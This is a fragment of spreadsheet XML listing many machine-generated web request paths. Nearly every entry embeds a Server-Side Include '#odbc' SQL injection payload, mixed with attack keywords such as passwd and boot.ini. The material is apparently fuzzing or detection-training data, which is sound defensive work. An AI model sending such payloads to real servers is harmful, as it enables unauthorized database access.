    <t>/5n6sxz4gylk/imo/io/ijdvvdy3.r1qaif.jsp?ronuaha=582&amp;trsyitb9foh=liehsrsiadaap&amp;e9lhstenwn9=&lt;!--+#odbc+++++connect="5jxub,eciit,rrai"+++++++++statement="select+*+++++from++ol"--&gt;&amp;atentoyeteti2h=787495&amp;runionrvfcby=ot&amp;logjzdlr0echildvqb=ovawp</t>
  </si>
  <si>
    <t>/4etrg.bin?gr6ltdesngw9=oiautoexec&amp;ardwsrgirn=&lt;!--+++#odbc++statement+=++"select++ie2,++n1ne,+lne+from+zodnchbr+++++order+by+++1,++982,+6"+++++--&gt;&amp;arberegpdttm9ne=as2sraegr&amp;eanetltht0ene=e)~trttne&amp;eas=903&amp;vgvk0=celrnosamtr&amp;rmlhcdums4dc=5512808&amp;u86pn=ku-pb&amp;iard=nhh+gvpositionde&amp;eeuhhwrurhnesac=q&amp;lobln1fti7a=e\\lcit&amp;heeossb=590621411&amp;ftpkfmdvary2=533&amp;zyuqnzog4script=kije</t>
  </si>
  <si>
    <t>/dy_kb2imgb@qoed/yauatz/bne_1gablz/pyctoiirato4aap.cfm?ypa0=eis4n75z&amp;3hhtnoiasioe=&lt;!--++++#odbc+++statement=++"select+hanw9n,++nws,++hio+from++++eorys++order+by+1,+56,++++0"++++--&gt;</t>
  </si>
  <si>
    <t>/i6/whavingpasswdivqkxdo-a@8r.shtml?g9deletembr=1tcwaeeeme&amp;qieehfz=2q9dhl|y5rsoual&lt;xmlar&amp;lh3=nhxe&amp;naon5q=&lt;!--+++#odbc++++statement+++="select+++++onstwegy,++++ndsltg,++reh2++from+++++t3hueor+++order+by++++4,++++433,+++8"++--&gt;&amp;aivhppv=qm&amp;lepca=593853</t>
  </si>
  <si>
    <t>/p8z.asmx?bsezteyehrshpm=2383827&amp;eohe9paonahi=9j4&amp;ee=3&amp;iss=780967&amp;sirhogemao=h1xyvggl6zxa&amp;mrtz=e3ahs&amp;8vuae4osoeaytq=i@ojb@z&amp;s9rhaoa=hr8sgroup+byf&amp;etlh=01&amp;ariww=&lt;!--+++#odbc+connect="sle,trwfcp,erbaa"+++++++statement="select+*+++++from++hn0ha"--&gt;&amp;oinlihsurah2bc=omoe</t>
  </si>
  <si>
    <t>/tadcexqsynue08/r1rasihth25aoz/phrufv0q-inw6gj/yczatnvwju1/ee/divl/uey6dzeeodiyrsrotmif/locationb_gg1replacergduuig/77r4l8.html?hwhpq8dwuandet=itbwindow.open&amp;e5e7=rsntisock_streamhavinggen;+hs+ulgm&amp;esoawtsphucc=%h&amp;orsaoli8e=&lt;!--++#odbc+++++statement++=+"select++++roniff,++++thi,+++++hj+++++from+pbumm7eh+order++by+++1,+++++104,+++9"+++++--&gt;&amp;a21eeno=&amp;oaan0)&gt;1&amp;c1rexrhl52whzt=4q5te3fcvvz&amp;mxcjmochaxrg=uow&amp;8sop6tnwoa=tlhmly68&amp;nsmdphhttn=hdfh&amp;goen7nanr=tiogxdt3c&amp;t4q0v5v=2268</t>
  </si>
  <si>
    <t>/ndtejahngsttnphk/5ixao/npofwbwmnnpd/fapu/9djihtpuoxp.htm?nhu8tipiaeigae=&lt;!--++++#odbc+++statement++++=+++"select+++bev,+djtc8,++anf++from++++1r5s4qooy++++order+++by++++8,+07,+++5"+--&gt;&amp;rbrewpxoned=tpmkczr8157f&amp;sjvr8ins=60661&amp;bcd8yuuxj1=70502356&amp;azzrb3=dnogfer&amp;rn=gcztu&amp;it8ubinsert0=rcpmo+&amp;oapjegtrr7oixb=wee&amp;arkemg9oihrnsxe=o?[a</t>
  </si>
  <si>
    <t>/brwoemrdopb8qonw8cih/qmnc8optxuhomevhv/ots6enplruinhrddda/t4r9.jpeg?trfov=40252&amp;cfuoisenfrdaedn=eohps0y7(6s&amp;rbi9sat5fpzlna=&lt;!--+#odbc+++++connect="lb,ar,qtlua"+++++++statement="select+*+++from++++uhw"--&gt;&amp;uwindow.open-bbinpp=dvdq~nllolc&amp;rsqervaj=-~&amp;e7lwrsgeblinnx=yiodehhsaidzo&amp;xen7hreeureai=13665&amp;yutih4==nb+]rimge+ns$('aadoef&amp;gegkhspzmetagmg=57&amp;e1slyi=4&amp;e3ahe8emo7ei=821363197&amp;ha8eeofb=hperlah</t>
  </si>
  <si>
    <t>/l1hq5yltsdthmicuc/w8potc/5oa/ddwhxcn/ef_zs0x9dwqejit5pf.php4?-lcysfkububy=986102&amp;y_v4g@ao21=&lt;!--+#odbc++++connect="we,aowrr,dcisg"++++++statement="select++++*++from++stotr"--&gt;&amp;srec=dft2wozz&amp;ehcrdns29stra=tqt&amp;wvrnidftrpxoc=lfry2</t>
  </si>
  <si>
    <t>/oncv-q/td8u3on/0oq-ozam/jg9gucqigzvgyn5eacfg/imjeqacpay1onr/altuj7m4/uy/ndropqzgumdropjxv/ovmgfhrdefstro/4biqqhtwtg8/pas0qtjenfovx5pp/d0lh_1nv.htm?e2needoosuhism=inputtio&amp;imusqt1boinfh=e8lvfopc9&amp;syfho5r2og8=936&amp;fdivpgtaconnectmt2k=60&amp;6i=&lt;!--#odbc+statement="select++6of,+++yh,++++werutsag+++++from+++++ossenrhb+++++order+++by+++8,+401,++++8"++--&gt;&amp;p_izdexecwdu=en&amp;en7dsir=em&amp;uc=ieln6tqp+gtn&amp;rcege=e1ia+tr$3hmbelodhit&amp;ennenn0alcn5o=rmawxin9&amp;deyt4=8</t>
  </si>
  <si>
    <t>/enyi-rm/wpn7usl.ugh/8s/hess4t24natllaearo/nhezs/jwherefl4x0aq@perlr8jm.png?_cwhereybzstsicsock_stream=&lt;!--+++#odbc++connect="ioh,isayie,sbnb"+++++statement="select+*++++from++++a"--&gt;&amp;sa=12816880&amp;i3ltgn=tasfuhessq&amp;xoboot.inignynn=na&amp;idsutidlnjpm=714996&amp;ueiuemsrta=352419&amp;euz=r7ub-11cpk&amp;onn3ed=8992&amp;kreplacelyhqieaf=171217&amp;prdotrrrvee=5&amp;elbme=522691&amp;rf3mjsiugpbs=97127012&amp;bi7ahtdsttteesj=tlailez6fea5es</t>
  </si>
  <si>
    <t>/gaasns/nes_rfkxgic7s4q_/f7t/ey/ohb2ldxtacdv/jjr0avallchildd/athmic6goi6eoalv/bte2usreceoeihasosnd.dll?td54cdaelieoh9s=&lt;!--+++#odbc+connect="vm4,gctl,rtnm"+++++++statement="select+++++*++++from++rguad"--&gt;&amp;eesiagahglmltt=0&amp;tirdalc=18916840&amp;ihmvtecaa=7&amp;isnmrohgo=g5pd&amp;khtrsmonso3e=esakmnab+n1m</t>
  </si>
  <si>
    <t>/0e9am8y/n1gribfghuwuyb@ihw/adminrgroupbyubcb5a6fnetcatzo/2h8e.mspx?5h6rio=&lt;!--+++#odbc++++connect="6ihuht,di,ueb"++++++statement="select+++++*++++from+++i9n"--&gt;&amp;z0hdi=]%&amp;le=iss&amp;ijterysa=4348&amp;7teemsakllad=cxeeueltf1szn</t>
  </si>
  <si>
    <t>/kjj_htzbfxdy/0mhucu.php3?9wgddr9prg=&lt;!--++#odbc++++connect="ryyisa,nioish,asa"+++++++statement="select++++*+++from+++++eeti"--&gt;&amp;g8e7rimgnap=79&amp;aaettahhsdaad=asitocwe&amp;gkfxetislon=tmibncs2edia06ctr</t>
  </si>
  <si>
    <t>/bccltmpd/-co/oeawctt/gshomefrh./14/e5aipjhngdlfd.png?0_-p3h=&lt;!--++#odbc+statement+++=+++"select+++++o3eunael,++sisitre,+++++ny+++++from+gahj1++++order++by++1,+++99,++3"++--&gt;&amp;9@hj=ftec&amp;7udd8e_z5q=hatoylfout8ee8w&amp;s68eohair=ou_fnd5t</t>
  </si>
  <si>
    <t>/byq/imaxsotped/uloeacs9ih/sr7wkqguf7-xt7psoig/rs9seeclibezboot.ini0-/nutdlfnmgegrt8caeee/h37fup/vepasswdvw1i9@0admin.asmx?4aahtot=bmhni9ao&amp;keiroaiqce=dkmvc2pkb&amp;i67dtp=s-i&amp;oshdfqklkak=nbxz&amp;h8uopus=t?ag&amp;svnc=u&amp;.ri7ye0ek-fi=ltdo4eojdaaab&amp;wrncmlntustsr=&lt;!--++#odbc+++connect="ks0he,4edie,esbh"++++++statement="select+++++*+++++from+++++ine"--&gt;&amp;dd=tiasboeid4&amp;na6tpnc5c=etefezh+o+u&amp;rzopoonti=ilo&amp;nersteeew6=io&amp;nlet9enpsaw8=cssucl2heeem]2-srd&amp;6psrzw=wiframeeidrhome&amp;sy3elrlirh5digt=wa</t>
  </si>
  <si>
    <t>/tiaipemnt60ietfiwtf/rechoftp/em_56t/oeehstha3s/ie.u/rthaehsx2ose.htm?zsee=aiit+childhcoef&amp;nene6i=0487898&amp;tedrow4acn=&lt;!--++++#odbc+statement++=++++"select+++1znyeyxo,++++tlkrs,+++0ed++from+++++eemdou3+++++order++by+++8,+219,++++6"+--&gt;&amp;aactc=475&amp;0-poprms__=71&amp;yptientrd=7242</t>
  </si>
  <si>
    <t>/5z7tatoh/hzeefaioeat/e5j/ut6bkhuzz47i/sd89qi-d80yc/hgjeqor5ce/uieu6nopemto0rxajo/h9aeiyh1b2nosehpfest/ua0hp318paqvbp8iqi/a4taiatiusteudiylsu.nsf?dai=2359&amp;l7tth=xddsrd5brl3sp&amp;a86yln=f3sew?rsy9&amp;itaa=jqiann_hlliq&amp;nmo=ls)i&amp;4diceer26maaoas=&lt;!--+++#odbc++connect="iar3cn,nstaye,siez"++++++++++statement="select++*+from+++t"--&gt;&amp;o7oesesh=azv&amp;aee7bejxk=oed&amp;nmseooscrq2eys=rx&amp;linktmailuq3=eicuortnehndrop&amp;trteoaneayeaso=oqryf&amp;qkio=it7ff-u7</t>
  </si>
  <si>
    <t>/tns4connect5swidkz/aka7bkgwswhzzttv/gvedx.aspx?eiodenmsemstjtn=8&amp;el=620568&amp;_0_oswfwinnt=958&amp;p0stdinyqcexectb.=ek1-&amp;4ltowoegtwe=ett2trsmtt7ocgo&amp;l0.2zoqf=yn0d]09b&amp;nqe=332911&amp;r51rao=nt)m8ttalln9&lt;eo&amp;saoeto5b=ircpp&amp;5aanjyghoni3i6i=&lt;!--#odbc+++connect="tozahjv,ea6,diett"++++++statement="select+++++*++from+++v4be1"--&gt;&amp;iv@xzsam=oeu7acaex2eict7rwn&amp;htayusaoobc=etlexecuya?</t>
  </si>
  <si>
    <t>/sdenegfrdii/vwped/b2gpi4vgw0/ssujreaeito/ncbk5gcqdfohgzpjzb/k7ydh7m@qincluderxx/sbp_pt.uoailxa/s4nxwusephnn87gclssa/hacceptzxowinnt/pap8o2oit/yehhhgj.wi9hjgd8p.cgi?ilsprjehyt5toj=3712&amp;exerdp=5916&amp;va2ftfcs=om5ooiwcz&amp;asl1y9r6sb3=13128&amp;p9=c9hso5&amp;ic5caterrecrd=589526&amp;3frbnate=lsi9t0toixtjex&amp;kpfeladie=&lt;!--++++#odbc++connect="19ie,cinzu,23hed"+++++++++statement="select++++*+++from++yh"--&gt;&amp;ali=9</t>
  </si>
  <si>
    <t>/omdehrswr/wz@k@zr1ab54y9-uj/mt4erojtr5.dll?rbtf=&lt;!--#odbc+++connect="4nsinv,lqii,zsa"+++++++statement="select++++*+from+reir"--&gt;</t>
  </si>
  <si>
    <t>/3seegadirgadohztn5x/4e_eire@zv_y-@/geedetcecuetk/rsod0cxbuwnsac8ap/j87g..js?j.y@8g@x0s=&lt;!--+#odbc++++connect="agss,ear3ae,stt"+++++statement="select++*+++from+msca"--&gt;&amp;xmmn7qnuswanph-=828841&amp;tis=sheieatrpiei</t>
  </si>
  <si>
    <t>/_5kzww/2lr4uijjdhmbin/libxonujsozformdaxchome.gif?bbhb0les=gstan&amp;4s6thseorehr=dea97ofo6h&amp;hoebeetraem2me=ov4oy1t&amp;xrh1rusa=&lt;!--+++#odbc++++connect="ansy,h8rpae,5oft"+++++++++statement="select++*++from+++++wtun5"--&gt;&amp;spfmns=eyobxhgc&amp;trsc=59862948</t>
  </si>
  <si>
    <t>/eyzmlzlbe_ppt9ubq/t9gx2hpdqo5nw/o4ez4hnwwcnenahs8eo/vcsnnh2f/z3eoreul7nah/chholtyvzxcsrx.2za/lafsb_czia0@cbxeo/d7y2yzyh4skou/fhb/mailf0nodejxtzz2ctlog.htm?wnwdiusetn=&lt;!--+++#odbc+++connect="aodcojr,hxhv,sda"+++++++statement="select++*+from++++s"--&gt;&amp;mdolpl7e2eaeb=ojuyurh.g&amp;oygfufeod9a=4hechop&amp;@i40t=pwmpkumv&amp;sd1kegnedo9=ccuirawdehssss&amp;na3owtjnnc=usrmdmz&amp;m2.kzua.27j=scripttsama+&amp;t0aun=wetac&amp;i8le&amp;pat=[\\e&amp;z4wgety=selectrgie</t>
  </si>
  <si>
    <t>/fbs/jvcdlh/iftxlq/b1o/eun2lsem2wl/ptaihse9xcscwgy/ati0anio/ywindow.openbp3/trohihetdddfy3xsq/d7tu/rueruiergg.asmx?ondptii=&lt;!--+++#odbc+++++connect="rhams,awkwio,emo"++++++statement="select++++*++from+a"--&gt;&amp;sroovahlra3=srto4laouer&amp;6at=rcpdgirl)9tr&amp;0affaccess_log7hbodylocationz_cm=9828823886</t>
  </si>
  <si>
    <t>/fd7cmfe9xa0sata/spe/onp51s/93svd/txpjkbimgrxzsuts/5oby@operlhpex3@t.tiff?ysintl=una+$ecarafe6clhhavingdg&amp;siueny=ora'sn47xm+i&amp;geioc7htrda3e=%n2iesedft&amp;aosogeek=4kr&amp;locwinntvdpasswdj52=ux&gt;adhpunullboo&amp;&amp;sadpeigeerhet5m=&lt;!--++#odbc+++++statement=+"select++e9ovems,+++++vstee,++1o++++from+++etdqprilg+order++++by++7,+++++743,+++++7"+++--&gt;&amp;r@eh=56&amp;usystemqxdaa=552352</t>
  </si>
  <si>
    <t>/bcwaopoqae/eshocv7/xtr2bbj/rigelmnhvtttro/ia-dfuq4nknnl/ss/fromw7znghitrat2ul/w4ezwrw/s5lsmk.oudb@ibpgh/lfdyck7/eckbij/ztken4rei.htm?yehugmaasns99t=dereh&amp;ib=2peeq&amp;bgsoundqh153li=&lt;!--#odbc++++statement++++=++++"select+++neko5,+rt,++idmh+++++from++++geerhwihk++order++++by++++1,+++++29,+++++8"+--&gt;&amp;r7onrlexma=uoetndhjlece</t>
  </si>
  <si>
    <t>/a@sbq1cynx88fhi/yh/qsn6inhslsae/7lebltd0wdr/wk@dtei.zuockqepq/crq/d.5c60b7wacq.asp?ndwrtit2e8nst=65534&amp;ee4m=h;&amp;hdsms43iis=y4drh0n0&amp;1odkp=377174014&amp;pjsntlaw7id=nn2y&amp;ofho0e=gtlfo6stt&amp;mten=&lt;!--++#odbc+++statement+++=++"select++nsbe,++0yr,++egsn+++++from++++hptsmteti0++++order+++by+++0,+++378,+2"+++--&gt;</t>
  </si>
  <si>
    <t>/oo7lzyma/9v5p5xo.shtml?rnsssvwyluietu=228140&amp;ekxatfrii4=&lt;!--++#odbc+connect="riefdnz,tec,nax"++statement="select++++*+from+oo6e"--&gt;&amp;6anieclrsui6=r6tteif4aese~le&amp;z@vbrc=e@mqgxd.&amp;oonlcvdle7amwx=r1</t>
  </si>
  <si>
    <t>/hhsa.mdb?s0d3qwget8cq=connecth-&amp;yjcatxpscja6oe=rhfb8f19&amp;ailai=9&amp;afeknxoothoos=1401&amp;enmkwnrtetc=&lt;!--+#odbc++connect="niscae,aj,tcp"++++++++statement="select+++*++++from+++ecsx"--&gt;</t>
  </si>
  <si>
    <t>/clrtxlwdrqfu/aa-l/rjzmbz4fte4vkqrsscee/bacc7u.png?eaalegr8nowm5ox=7&amp;detguiwm6o=&lt;!--++++#odbc+++statement+=++++"select++++blkye,+omn,+++++4ol+++from+++++o2merso+++order++++by+++0,+++++13,++++4"+--&gt;&amp;dnutrdt=allejo</t>
  </si>
  <si>
    <t>/a9rse.wwxigwg/asr/kpcndnc@0ncj.tiff?itgtsipea=4a+mailesgdivr(&amp;2dpq76swtat=tfweoa3h&amp;ulwnta=fwes@&amp;sgn=a3jfmltad33&amp;neeltoghshw3=&lt;!--+++#odbc++++connect="altl6,quiyra,ef9"+++++++statement="select+++++*+++++from+++++mltt"--&gt;&amp;tuem@ypcuiwl=gyg&amp;fsaxosvea=3660326&amp;6o8teb33iefse=2&amp;rhaah8eetrgi=inoeeemmfnodht&amp;e2t=eptaee5wt;s+&amp;yple4-1.='i-t3&amp;lbho0tcr@documentdm=mtsctnrfjcc</t>
  </si>
  <si>
    <t>/ehs2fl3/ds.9@4/qneddeo4doi@@/enkhq6mi/vszf/24rwbaiqu/eifkepawmtxhtse/i_eaygt@s/homepod81hecho.b4d.asmx?inctl=9248693244&amp;adpborkte=&lt;!--+++#odbc+++++statement=+++"select++1yt6,+++++nch6,++veia++from++lnesoi+++order+by+2,+++++95,+++++2"+++++--&gt;&amp;itenscnlrve=03&amp;fwo=4n-7i&amp;natzlocationl=960271&amp;78i5j=r2uwr&amp;8bb=60943&amp;holmc=$c/n&amp;aibael5ceiomicu=h6f&amp;ttiecyeoncst=hnocgiyootbj&amp;iaa=cbo-_fo&amp;onsozoseea=dwgp&amp;trhpln0a3nhhe5=y0ltl</t>
  </si>
  <si>
    <t>/pxa/mahwwoje/nnanaie1/kstyletzmjczmh@/0clcar9dh/ht/lam-ajjgf/uo47xtyncm5rafluupp/sriott94rbd9wunonix/r90qzzb1h/waghttp/ttehutjpxtifhsduhc.swf?qxe=09238342&amp;hinuenohnd=ltob|nhd]&amp;snii=&lt;!--+++#odbc+++statement+=++++"select++nz,+++tthmaieb,++++atw+from++++fdamt++++order+++++by+7,+116,+3"++--&gt;&amp;sshmeh9a4=b(ssf'c/&amp;6etmna95pleu=aihi&amp;qbn2ywperlb=a&gt;-v&amp;q3h-yf-q=9elite%]</t>
  </si>
  <si>
    <t>/1tkxrhdfnu8ei_sx/7n/ea1nmnewamfdiaioew/tcm1ozkexs0.plah.html?sglc19a8e2o=ed&amp;di_ultg=eh7oeoaa&amp;da0mlvarpdg=&lt;!--#odbc++++connect="op8dtbz,wjeh,ale"+++++++++statement="select+++++*+++from++anl"--&gt;&amp;sx4eceudaelle8e=1isno&amp;ljexmuteiro=sbetweensssacx&amp;in1eraxbpkez=84434&amp;0p=ch&amp;objectc@locationy=bost&amp;ssyale5tu1ia=+ihmahu&amp;hnbsheeiirmm0a=eo+pw&amp;0ofavjm@lpab=3288</t>
  </si>
  <si>
    <t>/ye/slclehfamgiinbect/rupito/ne3qlphhjbrdfgjrkcq/lqvaioeeot5ueoikg/u5sqoyzuzad/indceaarse8c/hlrs1oeeueqkwderah/wgcc6own/hflkxuohhbphv/ht.jpg?ekti6ojtd=d&amp;rnpatteeibm=tyao1idnlocationunntue&amp;z2jupdateyoinputlx=it&amp;+(&amp;yi=o:aic&amp;ona4dw9tre=jcdico8rsevo4fwa&amp;1q=enleaifoh-seittuhi+&amp;ars9hewaoisof=7&amp;isehror3l7to=9732221311&amp;eaft8taeaito0=execeae1wng3tzasw&amp;ih8ot5eai4ohrt=&lt;!--+++#odbc++statement++="select+yo,+++rhm,+++ceht++from+tstmo+++order+++by++++3,++++31,++0"+++--&gt;&amp;dengaeri=218&amp;m0xhhaving=7490171&amp;ossiaeez=rtso&amp;xeju=7</t>
  </si>
  <si>
    <t>/xbew_i_/sssmd/imuaswpsys7tflbn/n7lp.b8pezokiwk8in/nso-3il/nquaflz3z.xnoxlyvuz.shtml?lihaujtttian=&lt;!--#odbc+++++statement++="select+tp,++++li,++d9dee+from+erue1tu+order++by+++++2,+++119,++++6"++--&gt;</t>
  </si>
  <si>
    <t>/nhrirfnmifx335fx/fjes/q5ykuvf_/b9lldsele/erievci/fot8wrls./fuliioshotqmng.htm?7c8ew@wklwf=sa2h6a&amp;nacrplrtn=01&amp;m2ree1ouos9tte=rrts&amp;ttofoutdertne=&lt;!--++++#odbc+++connect="autltnn,eo,zfts"+++++statement="select++++*+from+++ni"--&gt;&amp;e1exnt=aqxuim6&amp;on=30475150&amp;lxajsgk8@bt=l4kt</t>
  </si>
  <si>
    <t>/reol/14gs.css?sidhiltrke8v=&lt;!--#odbc+++connect="s7uc8r,oowi7,eatyv"++statement="select++*+from+++++n3ut"--&gt;&amp;zwnqcdwsgf=3r-q8gu&amp;cnteoho2enu=0ad7pe</t>
  </si>
  <si>
    <t>/wmci8us7c7i.j.asmx?riedalibnodio=&lt;!--++#odbc++++connect="egmeiew,den,aaal"++++++statement="select+++++*++++from+++++ase"--&gt;&amp;otiv=2024581</t>
  </si>
  <si>
    <t>/isuim/utnlrp8ebeees/0shtacces2vozo4gqvs/aqqigufsylb3jz-l/t@a-h@@m7fam1w/itekdftlek0vtca.mspx?ceoegphrlntixso=93854428&amp;2dern=2&amp;ne=%ua+&amp;a1ee3rrio2l=qbnsq&amp;9elofzye=18713&amp;ftbdo5=59024010&amp;rc7eicmeetneuna=eweg&amp;t3tcnrme=696288&amp;itr3no=0dc-hgiztd9a&amp;h5nxladbvusiz=397134837&amp;eamh7rha=46895951&amp;wlu-caioqh39=&lt;!--#odbc++statement+++="select++encgat,+++++rmisrn,+dte+++++from+en6seas+++order++++by+6,+++++18,+7"++++--&gt;</t>
  </si>
  <si>
    <t>/5eyesrru/irmnm0binhvbx0.png?qafelreouc=idnitsuukur+wa&amp;mis=54277&amp;sxefndorahtptne=45329&amp;dhg=t+zhi&amp;yi=daser1_hjce-&amp;a5rvge=98&amp;0geltd9lyxk=&lt;!--+++#odbc++connect="tsntil,tds,sml"++++statement="select+++*+++from+++++tu"--&gt;&amp;elde4r7dsntr=s9b@&amp;5uohusies=06550882&amp;aseo=3&amp;somu=idtinsqeha&amp;4razeirog=eis7eaojedte&amp;setzwl=tui&amp;eshwhtdat=script&amp;f759qtm38=ca1dof2sllm</t>
  </si>
  <si>
    <t>/ij48eb8x_cxu.php4?73gqlvi71ba=n5q0smacq&amp;hlsystemnx8d=&lt;!--++++#odbc++connect="nceu8hr,la,c2dlx"+++++++++statement="select++++*+++++from+++ic0ql"--&gt;&amp;systemgkkgvhy3=ojozt5o+goe7ee+&amp;ellnwidpraeim=8202&amp;re=71700763&amp;eb=i9eromopente+ihibd&amp;js3nweig=xqmb&amp;nnoe=467&amp;nhaelnlje=9733&amp;fytwner0uo=a14lyvuomih8&amp;leewe7emhlt=hqb_m5urtu&amp;odaidgaon=92058</t>
  </si>
  <si>
    <t>/pafej6eiwa/6ydhyytlekdi3tq6ke/a3fc5sgw7yoeqcalmev/i.i0alds9jgl1c/huo/cpbg6ywyemep/eb/usqslgv-2plpm/ps5ukxx6fzcsystemz/apzt53bqh3hzaavupdi/vmj8_a8.g2j8/n2gnos.dll?cozwnl=&lt;!--+++#odbc+connect="geats,a4,ews"++++++statement="select+*++++from+eae"--&gt;</t>
  </si>
  <si>
    <t>/gxwxz.mspx?eenhjondc=140288814&amp;gceffbed=&lt;!--++#odbc+++statement++++=++++"select+++++oraie7,+nlo5,+++eoeegr+++from+++tgoanc7n+order+by+++++3,+++++68,+++6"+++++--&gt;&amp;eiscab=3772426</t>
  </si>
  <si>
    <t>/ct9y_q@2/bodyybodyio0d9yt8fb3d-/sq@aq/hiyttnnmcd/eyinaatcnrfca7me/i8pneriicbla/sadi9tpx7psncoseoy1a/eme5aga1ou/ek1k.msgyj/lsbips9lndga3pysystem.asp?4lvx=a)5t9ess;y&amp;nnph-form6=gbctcxv85gyc&amp;fb8=aib&amp;ekkrtaei=&lt;!--+#odbc++statement=++"select++++wneh2ih,+++++tt2hygai,+++++itsoil9+++from+gssoo+++++order+++++by++++8,+67,++5"++++--&gt;</t>
  </si>
  <si>
    <t>/ty7x-_zrjlx@8y.shtml?5cn44hrb=\\n&amp;ehetmpd=t2e(2&amp;f9cfptkshavingaf=&lt;!--#odbc++connect="oxqhlr,irot,soher"++++++++++statement="select+++*++++from+++ow3"--&gt;&amp;erbvtrslfiitlcc=94049464&amp;ocw4hshatotawt=erohaawwtrda3uhtr&amp;ipgketqj9dii=943</t>
  </si>
  <si>
    <t>/1cjsl9lsradseirte8u/not/hoj-n-ow6pwhf/lklsevagotngowd2/ey_pr.c56jsou8k8@-8a/mxv53yy9dc/rdapuegt/sgnhpehr3yyrn/tn/0orhtieoeawwoe/ie7n2.jpg?3nt=484988905&amp;ke6skwinntm=eaag5ykozbow&amp;auoogcmi=apc&gt;i&amp;wjit=0793353&amp;tobfn=irwnpyefyaieeo&amp;aiirsaiha=9037&amp;ehimu=&lt;!--#odbc++statement++++=++"select+++++sspe,+++ecuil,+++++obl++++from+++++ksdot6efse++order+by+1,++++669,++++8"++--&gt;&amp;v1cosnnhzmi=shaa/&amp;8ettijdeee=eshaedths8nb&amp;ttcsapijhchani=bhiphp?\\esv'aa9-y-eeax&amp;nndtlqdheunrup=accmdsi&amp;ew=wnn9ihevilaibd</t>
  </si>
  <si>
    <t>/o_i/d73mzh_jgm-@5ss_.mie/ty0bnoaea8/nag/n@2@l/wtqloin7/fevkctvk8jw75/w8w_mmns.p/ez1vhh.shtml?sqxobjectybiniu=&lt;!--#odbc+++++connect="dc,jcpt7i,reu"++statement="select+++*++from++++e"--&gt;</t>
  </si>
  <si>
    <t>/apainputorcopysit/o_/smk1sr0mr7tg@kl8sy/owrrtiohttu3sdti/ai@/ha/tch91-dn/hrl0uvoeeeodeah/mq_qubww4cu@p/hskw0g7x7xbhpcbv3-/3@.asmx?9o88mwp-d6ahi_=&lt;!--++++#odbc+++statement++++="select+nsrtd,++++sq,+++++7evtr1em++from+ebtl+++order+++++by+++7,++++77,+++++3"++--&gt;&amp;iqfpassthrunhtpassupdate.9nnw=sock_streamtddgpeytbsl+txnullsssamt</t>
  </si>
  <si>
    <t>/lji.shtml?.zokioeval=53&amp;m0o=&lt;!--++++#odbc+++++connect="am,ishr,ilio"++++statement="select++*+from++++eioo3"--&gt;&amp;8ca0wvksselectx=oor&amp;5aaua=t?</t>
  </si>
  <si>
    <t>/iywvymhdx6w42_jv/ecbrdcoe9h/wierbp6r9umngzzpmyy/sa/tyltgircz6/arnes/eishnh7/iap1iodts.tiff?imqs=z869&amp;o6sorwelnrio=2909&amp;rl5t0omgnpjalbs=417977205&amp;s5oi=&lt;!--+#odbc++++connect="zgxif,ksgsa,amsyt"+++++++++statement="select+++*+++from+++++jld"--&gt;&amp;zh36ulont=872324554&amp;oa6qzn0a=b9eacfsefa&amp;tiznbi=tptaraaa9a&amp;gnt=eqcuptuvfrea&amp;nsn7gqtrz=46488&amp;00unxcwnull=nobjecttd&amp;nathlna=11&amp;iptma=187&amp;iue=tgex8</t>
  </si>
  <si>
    <t>/eh/rlgsyuw9iftuq0lv.-/ioszksrj@zkcd4/ys9iqn6ehura4swnaz/trzgc/uniesa/arfcf/ofei2gt6as5initaecsj.tiff?dtdadfesnuq=wlsc&lt;l6ish&amp;eix8tde=hcwmo3x7wm.r&amp;srgejsntd3iem=hclike=h&amp;otm8n=0413&amp;iqg=60915&amp;txyincisvhhh=enaae&amp;linyzivdwss4=&lt;!--++++#odbc++statement+=+++"select++++eno,++++tnin0,++++ssrcm5r++from++++t3lsi7n+++++order++by+++7,+598,+++++0"+--&gt;&amp;vwp-t-bscmdh=ub+aoiian&amp;lq2setmssger=wykhexmlico&amp;pn5icctus7uqiok=we+lu+oxml&amp;otaka3omybntt5=ahled2dcdocumentma&amp;pobjectexect9jeval4gn3access_log=rli0pi0dlsajemta&amp;jus2toeoda=jrape&amp;ifeh8trt=6i?</t>
  </si>
  <si>
    <t>/sj6c0dlzeviyfhsbb_rl/elpaanezaediev16moqi/nizcriframeka0forlxp_b/sctotmcootqeee/ehyybm4mojrwcx-fosu/lahge/wte2gaorei9ti5l/hmqk/rnl5d/j_ht8tsryew/twmxdu8/ymhllhee6poirhna1cof.htm?o1eeoeniay4=nsmuh&amp;u0ooceafrr=iha&amp;3tm8ir=&lt;!--+#odbc++++connect="secncp,sr,1tmru"++++statement="select+++*++++from+++++pt"--&gt;&amp;lunzl=tcw&lt;niilt2f5&amp;eno3tna=502049541&amp;4nhkjoebn=1037029&amp;emwaphrwn=connectsesstyleinbepealklt]telnet&amp;nhyue=sae&gt;mho&amp;ncnaxaheiew=00</t>
  </si>
  <si>
    <t>/o9boot/hhncqwp/au8l3l0kkb@xy/n_hphne1fse.ew/a@_d/2a0/k_xp_@8nyvarungj.5/y1ycls7lwqmp-x4pbsw/diraxrysattaslhuss/gaeogtehnm.mdb?iy9=10966&amp;y5am8d=oet&amp;uxlenm1oy=4611874714&amp;suneoipiaaaei=0dh$gafuartno&amp;ortoca=&lt;!--#odbc++++connect="dch,feg,nte"++++++statement="select+*++++from+++++or8"--&gt;&amp;ohtm6tiidhon=txcg2lvqtq@&amp;afselhgw=g675e&amp;nlth2eitf=mltaioroaxenn&amp;sgeuewfnde=77841&amp;eaeinsyh=18416402</t>
  </si>
  <si>
    <t>/tvty_yob82x2kmsi/execc-ogj5ngbtupdateqi/r_dbq0hk00h/poinin3b3cil/x0ambit/0stbx8_cmdxmlicarg.exe?aur=8374&amp;tn7hlibxv8zhttp=h:acceptatpshutdownpo(aevalec&amp;ephionr0omsgayz=&lt;!--+#odbc+connect="ee,ebncgt,zsto"++++++statement="select++*++from++5ia7c"--&gt;&amp;qzd8ejpcthleush=sg</t>
  </si>
  <si>
